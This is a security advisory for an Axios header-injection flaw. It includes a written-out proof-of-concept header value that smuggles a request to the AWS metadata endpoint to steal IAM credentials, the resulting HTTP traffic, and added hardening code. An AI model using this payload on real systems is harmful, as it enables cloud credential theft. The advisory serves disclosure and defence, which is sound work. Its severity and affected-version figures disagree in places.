
Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain

CVE-2026-40175 | RCE | 2026-04-10

Vulnerability description

# Vulnerability Disclosure: Unrestricted Cloud Metadata Exfiltration via Header Injection Chain

## Summary

The Axios library is vulnerable to a specific "gadget" attack chain that allows **Prototype Pollution** in any third-party dependency to be escalated into **Remote Code Execution (RCE)** or **Full Cloud Compromise** (via AWS IMDSv2 bypass). While Axios patches exist for *preventing* pollution, the library remains vulnerable to *being used* as a gadget when pollution occurs elsewhere. This is due to a lack of HTTP header sanitization (CWE-113) combined with default SSRF capabilities.

**Severity**: Critical (CVSS 9.9)

**Affected Versions**: All versions (v0.x - v1.x)

**Vulnerable Component**: `lib/adapters/http.js` (header processing)

## Usage of "Helper" Vulnerabilities

This vulnerability is unique because it requires **zero direct user input**. If an attacker can pollute `Object.prototype` via *any* other library in the stack (e.g., `qs`, `minimist`, `ini`, `body-parser`), Axios will automatically pick up the polluted properties during its config merge. Because Axios does not sanitise these merged header values for CRLF (`\r\n`) characters, the polluted property becomes a **request smuggling** payload.

## Proof of Concept

### 1. The Setup (Simulated Pollution)

Imagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets:

```javascript
Object.prototype['x-amz-target'] = "dummy\r\n\r\nPUT /latest/api/token HTTP/1.1\r\nHost: 169.254.169.254\r\nX-aws-ec2-metadata-token-ttl-seconds: 21600\r\n\r\nGET /ignore";
```

### 2. The Gadget Trigger (Safe Code)

The application makes a completely safe, hardcoded request:

```javascript
// This looks safe to the developer
await axios.get('https://analytics.internal/pings');
```

### 3. The Execution

Axios merges the prototype property `x-amz-target` into the request headers. It then writes the header value directly to the socket without validation.
**Resulting HTTP traffic:**

```http
GET /pings HTTP/1.1
Host: analytics.internal
x-amz-target: dummy

PUT /latest/api/token HTTP/1.1
Host: 169.254.169.254
X-aws-ec2-metadata-token-ttl-seconds: 21600

GET /ignore HTTP/1.1
...
```

### 4. The Impact (IMDSv2 Bypass)

The "smuggled" second request is a valid `PUT` request to the AWS Metadata Service. It includes the required `X-aws-ec2-metadata-token-ttl-seconds` header (which a normal SSRF cannot send). The Metadata Service returns a session token, allowing the attacker to steal IAM credentials and compromise the cloud account.

## Impact Analysis

- **Security Control Bypass**: Defeats AWS IMDSv2 (session tokens).
- **Authentication Bypass**: Can inject headers (`Cookie`, `Authorization`) to pivot into internal administrative panels.
- **Cache Poisoning**: Can inject `Host` headers to poison shared caches.

## Recommended Fix

Validate all header values in `lib/adapters/http.js` and `xhr.js` before passing them to the underlying request function.

**Patch Suggestion:**

```javascript
// In lib/adapters/http.js
utils.forEach(requestHeaders, function setRequestHeader(val, key) {
  if (/[\r\n]/.test(val)) {
    throw new Error('Security: Header value contains invalid characters');
  }
  // ... proceed to set header
});
```

## References

- **OWASP**: CRLF Injection (CWE-113)

This report was generated as part of a security audit of the Axios library.
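The following is an added example, not Axios's code and not part of the advisory, showing a hardened header merge that closes both links of the chain described above: it rejects header values containing CR, LF or other control characters (the check the patch suggestion proposes, widened to the full set of characters a field value may not contain), and it copies only own properties during the merge, so an entry added to `Object.prototype` is never picked up as a header. The `forInMerge` function is a simplified illustration of the gadget pattern (a `for...in` walk that inherits enumerable prototype keys), not a reproduction of Axios's merge logic. All function names, the polluted key `x-polluted` and the sample header values are this example's own.

```javascript
// Added example (not Axios's code): a hardened header merge for a Node HTTP
// client. It addresses both links of the chain described in the advisory:
//   1. header values are validated so that CR/LF can never split the request;
//   2. only own properties are merged, so a polluted Object.prototype entry is
//      never picked up as a header.
// All function names here are this example's own.

// RFC 9110 allows visible ASCII, SP, HTAB and obs-text in a field value.
// CR, LF, NUL, the other C0 controls and DEL are rejected outright.
const FORBIDDEN_IN_HEADER_VALUE = /[\x00-\x08\x0a-\x1f\x7f]/;

function isValidHeaderValue(value) {
  return typeof value === 'string' && !FORBIDDEN_IN_HEADER_VALUE.test(value);
}

// Throws instead of silently dropping, so a polluted or tainted value shows up
// in logs rather than becoming a malformed request on the wire.
function assertHeaderValue(name, value) {
  const text = Array.isArray(value) ? value.join(', ') : String(value);
  if (!isValidHeaderValue(text)) {
    throw new TypeError(`Invalid character in value for header "${name}"`);
  }
  return text;
}

// Simplified illustration of the gadget pattern (not Axios's code): for...in
// walks inherited enumerable keys, so anything added to Object.prototype
// lands in the output object.
function forInMerge(src) {
  const out = {};
  for (const key in src) out[key] = src[key];
  return out;
}

// Hardened merge: Object.keys() yields own enumerable keys only, the result
// object has no prototype at all, and every value is validated before storage.
function mergeHeaders(defaults, overrides) {
  const out = Object.create(null);
  for (const src of [defaults, overrides]) {
    if (!src) continue;
    for (const key of Object.keys(src)) {
      out[key.toLowerCase()] = assertHeaderValue(key, src[key]);
    }
  }
  return out;
}

// Serialise the request head exactly as it would be written to the socket.
function buildRequestHead(method, path, host, headers) {
  const merged = mergeHeaders({ host }, headers);
  const lines = [`${method} ${path} HTTP/1.1`];
  for (const [name, value] of Object.entries(merged)) {
    lines.push(`${name}: ${value}`);
  }
  return lines.join('\r\n') + '\r\n\r\n';
}

// Demo: pollute Object.prototype the way a vulnerable parser might (constructed
// key and value, harmless here), compare the two merges, then clean up.
function demo() {
  Object.prototype['x-polluted'] = 'dummy\r\nInjected: yes';
  try {
    const naive = forInMerge({ accept: 'text/plain' });
    const head = buildRequestHead('GET', '/pings', 'analytics.internal', { accept: 'text/plain' });
    let crlfRejected = false;
    try {
      assertHeaderValue('x-test', 'a\r\nb');
    } catch (err) {
      crlfRejected = err instanceof TypeError;
    }
    return {
      inheritedByForIn: Object.prototype.hasOwnProperty.call(naive, 'x-polluted'),
      leakedViaSafeMerge: head.includes('x-polluted'),
      crlfRejected,
    };
  } finally {
    delete Object.prototype['x-polluted'];
  }
}

console.log(demo());
// { inheritedByForIn: true, leakedViaSafeMerge: false, crlfRejected: true }
```

Run with `node` to see the three results: the `for...in` merge inherits the polluted key, the hardened merge does not, and a value containing CRLF is refused before it can reach the socket. Throwing on an invalid value, rather than stripping the offending characters, is the safer choice for a library: a silently edited value can still be unexpected, whereas a thrown error surfaces the pollution where it can be investigated.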
Source Code Location: https://github.com/axios/axios

Affected Packages:
- npm:axios, affected < 1.15.0, patched in 1.15.0

CWEs:
- CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
- CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
- CWE-918: Server-Side Request Forgery (SSRF)

CVSS:
- Primary: score 10.0, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- CVSS_V3: score 10.0, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

References:
- https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx
- https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1
- https://github.com/axios/axios/releases/tag/v1.15.0
- https://github.com/advisories/GHSA-fvcv-3m26-pcqx
